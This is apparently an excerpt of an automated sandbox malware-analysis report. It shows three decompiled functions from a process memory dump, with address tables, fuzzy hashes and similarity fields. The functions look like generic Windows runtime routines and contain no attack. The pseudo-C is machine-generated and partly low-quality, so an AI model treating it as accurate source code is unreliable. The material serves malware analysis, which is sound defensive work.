                                        • Instruction Fuzzy Hash: 4D913431E01215EBEF319BACCC48BADBBA4EB05724F050269FA52AB2D5D7749D41CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016AC600 Relevance: .2, Instructions: 225COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 67%
                                        			E016AC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x179d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E016B6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E016EB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1797b9c; // 0x0
					_t74 = L016C4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E016E9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L016C77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E016EF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E016E13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L016C77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E016E9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                        0x016ac608
                                        0x016ac615
                                        0x016ac625
                                        0x016ac62d
                                        0x016ac635
                                        0x016ac640
                                        0x016ac680
                                        0x016ac687
                                        0x016ac688
                                        0x016ac689
                                        0x016ac694
                                        0x016ac694
                                        0x016ac642
                                        0x016ac64a
                                        0x016ac697
                                        0x01717a25
                                        0x01717a2b
                                        0x01717a2e
                                        0x01717a30
                                        0x01717bea
                                        0x01717bea
                                        0x00000000
                                        0x01717bea
                                        0x01717a36
                                        0x01717a43
                                        0x01717a48
                                        0x01717a4c
                                        0x01717a4e
                                        0x00000000
                                        0x00000000
                                        0x01717a58
                                        0x01717a5a
                                        0x01717a5b
                                        0x01717a5c
                                        0x01717a5d
                                        0x01717a63
                                        0x01717a64
                                        0x01717a6a
                                        0x01717a6c
                                        0x01717a6e
                                        0x017179cb
                                        0x017179cb
                                        0x017179ce
                                        0x017179d0
                                        0x01717a98
                                        0x01717a9b
                                        0x01717a9b
                                        0x01717a9e
                                        0x01717aa1
                                        0x01717bbe
                                        0x01717bbe
                                        0x01717bc0
                                        0x01717be0
                                        0x01717be0
                                        0x01717a01
                                        0x01717a01
                                        0x01717a05
                                        0x01717a07
                                        0x01717a15
                                        0x01717a15
                                        0x01717a1a
                                        0x00000000
                                        0x01717a1a
                                        0x01717bc2
                                        0x01717bc6
                                        0x01717bc9
                                        0x01717bcd
                                        0x01717bcf
                                        0x017179e6
                                        0x017179e6
                                        0x017179eb
                                        0x017179eb
                                        0x017179ef
                                        0x017179f1
                                        0x00000000
                                        0x00000000
                                        0x017179f3
                                        0x017179f5
                                        0x017179ff
                                        0x017179ff
                                        0x00000000
                                        0x017179ff
                                        0x017179f7
                                        0x017179fd
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x017179fd
                                        0x01717bd5
                                        0x01717bd8
                                        0x00000000
                                        0x00000000
                                        0x01717ba9
                                        0x01717bac
                                        0x01717bb0
                                        0x01717bb1
                                        0x01717bb1
                                        0x01717bb6
                                        0x00000000
                                        0x01717bb6
                                        0x01717aa7
                                        0x01717aaa
                                        0x00000000
                                        0x00000000
                                        0x01717ab2
                                        0x01717ab3
                                        0x01717ab5
                                        0x01717aec
                                        0x01717aef
                                        0x01717b25
                                        0x01717b28
                                        0x01717b62
                                        0x01717b64
                                        0x01717b8f
                                        0x01717b92
                                        0x01717b96
                                        0x01717b98
                                        0x00000000
                                        0x00000000
                                        0x01717b9e
                                        0x01717b9f
                                        0x01717ba3
                                        0x00000000
                                        0x01717ba3
                                        0x01717b66
                                        0x01717b68
                                        0x01717ae2
                                        0x01717ae2
                                        0x00000000
                                        0x01717ae2
                                        0x01717b6e
                                        0x01717b72
                                        0x01717b75
                                        0x01717b81
                                        0x01717b85
                                        0x01717b87
                                        0x00000000
                                        0x00000000
                                        0x01717b31
                                        0x01717b34
                                        0x01717b3c
                                        0x01717b45
                                        0x01717b46
                                        0x01717b4f
                                        0x01717b51
                                        0x01717b57
                                        0x01717b59
                                        0x01717b59
                                        0x00000000
                                        0x01717b59
                                        0x01717b77
                                        0x00000000
                                        0x01717b77
                                        0x01717b2a
                                        0x00000000
                                        0x01717b2a
                                        0x01717af1
                                        0x01717af3
                                        0x00000000
                                        0x00000000
                                        0x01717afb
                                        0x01717afc
                                        0x01717afe
                                        0x00000000
                                        0x00000000
                                        0x01717b00
                                        0x01717b03
                                        0x00000000
                                        0x00000000
                                        0x01717b05
                                        0x01717b09
                                        0x01717b0d
                                        0x01717b0f
                                        0x00000000
                                        0x00000000
                                        0x01717b18
                                        0x01717b1d
                                        0x00000000
                                        0x01717b1d
                                        0x01717ab7
                                        0x01717ab9
                                        0x00000000
                                        0x00000000
                                        0x01717abf
                                        0x01717ac1
                                        0x00000000
                                        0x00000000
                                        0x01717ac3
                                        0x01717ac6
                                        0x00000000
                                        0x00000000
                                        0x01717ac8
                                        0x01717acc
                                        0x01717ad0
                                        0x01717ad2
                                        0x00000000
                                        0x00000000
                                        0x01717adb
                                        0x00000000
                                        0x01717adb
                                        0x017179d6
                                        0x017179d9
                                        0x017179dc
                                        0x01717a91
                                        0x01717a94
                                        0x00000000
                                        0x01717a94
                                        0x017179e2
                                        0x00000000
                                        0x017179e2
                                        0x01717a74
                                        0x01717a7a
                                        0x00000000
                                        0x00000000
                                        0x01717a8a
                                        0x01717a21
                                        0x01717a21
                                        0x00000000
                                        0x01717a21
                                        0x016ac650
                                        0x016ac651
                                        0x016ac656
                                        0x016ac65c
                                        0x016ac65d
                                        0x016ac663
                                        0x016ac664
                                        0x016ac66a
                                        0x016ac66e
                                        0x017179c5
                                        0x017179c7
                                        0x00000000
                                        0x017179c7
                                        0x016ac67a
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 73c1f9974d9f6674bc545c44fb7bf82b33819d5edca76637aaa5e99ac91d1a3b
                                        • Instruction ID: d9d513c306318fdec497f75ac948fc8caebe8f65beefc4bdc4e6fe7e39e35fc7
                                        • Opcode Fuzzy Hash: 73c1f9974d9f6674bc545c44fb7bf82b33819d5edca76637aaa5e99ac91d1a3b
                                        • Instruction Fuzzy Hash: 4D8194766082019FDB2ACF5CC880A7AF7E5FB84350F14495EEE459B249D730EE45CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0173B8D0 Relevance: .2, Instructions: 199COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 39%
                                        			E0173B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1797b9c; // 0x0
				_t124 = L016C4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E016E9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E016E95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E016E95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L016C77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E016E9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E016E95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1797b9c; // 0x0
									_t92 = L016C4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E016E9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E016AA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0173E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0173E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E016E95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                        0x0173b8d9
                                        0x0173b8e4
                                        0x00000000
                                        0x0173b8e6
                                        0x0173b8f3
                                        0x0173b8f5
                                        0x0173b8f5
                                        0x0173b8f8
                                        0x0173b920
                                        0x0173b924
                                        0x0173b936
                                        0x0173b939
                                        0x0173b93d
                                        0x0173b948
                                        0x0173b9a0
                                        0x0173b9a0
                                        0x0173b9a4
                                        0x0173b9bf
                                        0x0173b9c4
                                        0x0173b9c6
                                        0x0173b9cd
                                        0x0173b9d1
                                        0x0173bad4
                                        0x0173bad8
                                        0x0173bada
                                        0x0173badc
                                        0x0173badc
                                        0x0173badf
                                        0x0173bae0
                                        0x0173bae2
                                        0x0173bae4
                                        0x0173baec
                                        0x0173baee
                                        0x0173baf0
                                        0x0173baf0
                                        0x0173baec
                                        0x0173bafb
                                        0x0173bafc
                                        0x0173bafe
                                        0x0173bb01
                                        0x0173bb01
                                        0x00000000
                                        0x0173bb06
                                        0x0173b9d7
                                        0x0173b9db
                                        0x0173b9db
                                        0x0173b9de
                                        0x0173b9de
                                        0x0173b9e4
                                        0x0173b9e7
                                        0x0173b9ea
                                        0x0173b9ec
                                        0x0173b9ef
                                        0x0173b9f3
                                        0x0173ba1b
                                        0x0173ba1b
                                        0x0173ba23
                                        0x0173ba24
                                        0x0173ba27
                                        0x0173ba2a
                                        0x0173ba2b
                                        0x0173ba2e
                                        0x0173ba30
                                        0x0173ba37
                                        0x0173ba3f
                                        0x0173ba9c
                                        0x0173baa2
                                        0x0173bb13
                                        0x0173bb15
                                        0x0173baae
                                        0x0173baae
                                        0x0173bab3
                                        0x0173bab5
                                        0x0173baba
                                        0x0173bac8
                                        0x0173bac8
                                        0x0173baba
                                        0x0173bacd
                                        0x0173bacf
                                        0x00000000
                                        0x0173bacf
                                        0x0173bb1a
                                        0x00000000
                                        0x0173bb1c
                                        0x0173baa7
                                        0x0173bb11
                                        0x00000000
                                        0x0173bb11
                                        0x0173baa9
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0173ba41
                                        0x0173ba41
                                        0x0173ba41
                                        0x0173ba58
                                        0x0173ba5d
                                        0x0173ba62
                                        0x00000000
                                        0x00000000
                                        0x0173ba64
                                        0x0173ba67
                                        0x0173ba68
                                        0x0173ba69
                                        0x0173ba6c
                                        0x0173ba6f
                                        0x0173ba71
                                        0x0173ba78
                                        0x0173ba80
                                        0x00000000
                                        0x00000000
                                        0x0173ba90
                                        0x0173ba90
                                        0x0173ba97
                                        0x00000000
                                        0x0173ba97
                                        0x0173b9f5
                                        0x0173b9f7
                                        0x0173b9f7
                                        0x0173b9fa
                                        0x0173ba03
                                        0x0173ba07
                                        0x0173ba0c
                                        0x0173ba10
                                        0x0173ba17
                                        0x00000000
                                        0x0173b9f7
                                        0x0173b9a6
                                        0x0173b9a8
                                        0x0173b9af
                                        0x0173b9b3
                                        0x00000000
                                        0x00000000
                                        0x0173b9b9
                                        0x00000000
                                        0x0173b9b9
                                        0x0173b94d
                                        0x0173b98f
                                        0x0173b995
                                        0x0173b999
                                        0x0173b960
                                        0x0173b967
                                        0x0173b968
                                        0x0173b96a
                                        0x00000000
                                        0x0173b96a
                                        0x0173b99b
                                        0x0173b99e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0173b99e
                                        0x0173b951
                                        0x0173b954
                                        0x0173b95a
                                        0x0173b95e
                                        0x0173b972
                                        0x0173b979
                                        0x0173b97d
                                        0x0173b97f
                                        0x0173b980
                                        0x0173b982
                                        0x0173b984
                                        0x00000000
                                        0x0173b984
                                        0x00000000
                                        0x0173b926
                                        0x00000000
                                        0x0173b926

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f1a68b8d6f7c1673f70d9c3e34a4aa20f7d1e149fd9ddcac8145811ba40fd335
                                        • Instruction ID: c1a949ae1ba97ef1da9414c2677d6d6e3dbaf5c5fa8b19b350d5d4f15354253e
                                        • Opcode Fuzzy Hash: f1a68b8d6f7c1673f70d9c3e34a4aa20f7d1e149fd9ddcac8145811ba40fd335
                                        • Instruction Fuzzy Hash: 0971DF32200B06EFE7328F29CC44F66BBE6EF84720F15452CE655872A2DB71E945CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016A52A5 Relevance: .2, Instructions: 161COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E016A52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E016BEEF0(0x17979a0);
					_t104 =  *0x1798210; // 0x1242be8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E016BEB70(_t93, 0x17979a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E016E9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E016BEEF0(0x17979a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E016BEB70(0, 0x17979a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1242bf5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E016DF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E016BEEF0(0x17979a0);
									__eflags =  *0x1798210 - _t104; // 0x1242be8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1798210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01724888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E016BEB70(_t95, 0x17979a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E016E95D0();
											L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E016E95D0();
											L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E016BEB70(_t93, 0x17979a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E016E95D0();
										L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E016E95D0();
										L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E016DF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                        0x016a52a5
                                        0x016a52ad
                                        0x016a52b0
                                        0x016a52b3
                                        0x016a52b7
                                        0x016a52ba
                                        0x016a52bf
                                        0x016a52c4
                                        0x016a52cc
                                        0x00000000
                                        0x00000000
                                        0x016a52ce
                                        0x016a52d9
                                        0x016a52dd
                                        0x016a52e7
                                        0x016a52f7
                                        0x016a52f9
                                        0x016a52fd
                                        0x01700dcf
                                        0x01700dd5
                                        0x01700dd6
                                        0x01700dd7
                                        0x01700dd8
                                        0x01700dd9
                                        0x01700dde
                                        0x01700ddf
                                        0x01700de0
                                        0x01700de1
                                        0x01700de2
                                        0x01700de5
                                        0x01700dea
                                        0x01700dec
                                        0x01700f60
                                        0x01700f64
                                        0x01700f70
                                        0x01700f76
                                        0x01700f79
                                        0x01700f79
                                        0x00000000
                                        0x01700f64
                                        0x01700df2
                                        0x01700df7
                                        0x01700e04
                                        0x01700e0d
                                        0x01700e0d
                                        0x01700e10
                                        0x01700e1a
                                        0x01700e1c
                                        0x01700e4c
                                        0x01700e52
                                        0x01700e61
                                        0x01700e67
                                        0x01700e6b
                                        0x01700e70
                                        0x01700e76
                                        0x01700ed7
                                        0x01700edc
                                        0x01700ee0
                                        0x01700ee6
                                        0x01700eea
                                        0x01700eed
                                        0x01700ef0
                                        0x01700ef3
                                        0x01700ef6
                                        0x01700ef9
                                        0x01700efe
                                        0x01700f01
                                        0x01700f01
                                        0x01700f0b
                                        0x01700f12
                                        0x01700f16
                                        0x01700f18
                                        0x01700f1b
                                        0x01700f2c
                                        0x01700f31
                                        0x01700f31
                                        0x01700f35
                                        0x01700f39
                                        0x01700f3a
                                        0x01700f3c
                                        0x01700f3f
                                        0x01700f50
                                        0x01700f55
                                        0x01700f55
                                        0x01700f59
                                        0x016a52eb
                                        0x016a52f1
                                        0x016a52f1
                                        0x01700e7d
                                        0x01700e84
                                        0x01700e88
                                        0x01700e8a
                                        0x01700e8d
                                        0x01700e9e
                                        0x01700ea3
                                        0x01700ea3
                                        0x01700ea7
                                        0x01700eaf
                                        0x01700eb3
                                        0x01700eb9
                                        0x01700eb9
                                        0x01700ebc
                                        0x01700ecd
                                        0x01700ecd
                                        0x00000000
                                        0x01700eb3
                                        0x01700e21
                                        0x01700e2b
                                        0x01700e2f
                                        0x01700e30
                                        0x01700e3a
                                        0x01700e3f
                                        0x01700e41
                                        0x00000000
                                        0x00000000
                                        0x01700e47
                                        0x00000000
                                        0x01700e47
                                        0x01700df9
                                        0x01700dfe
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x01700dfe
                                        0x016a5303
                                        0x016a5307
                                        0x00000000
                                        0x016a5309
                                        0x00000000
                                        0x016a5309
                                        0x016a5307
                                        0x016a52e9
                                        0x016a52e9
                                        0x00000000
                                        0x016a52e9
                                        0x016a530e
                                        0x00000000

                                        Memory Dump Source
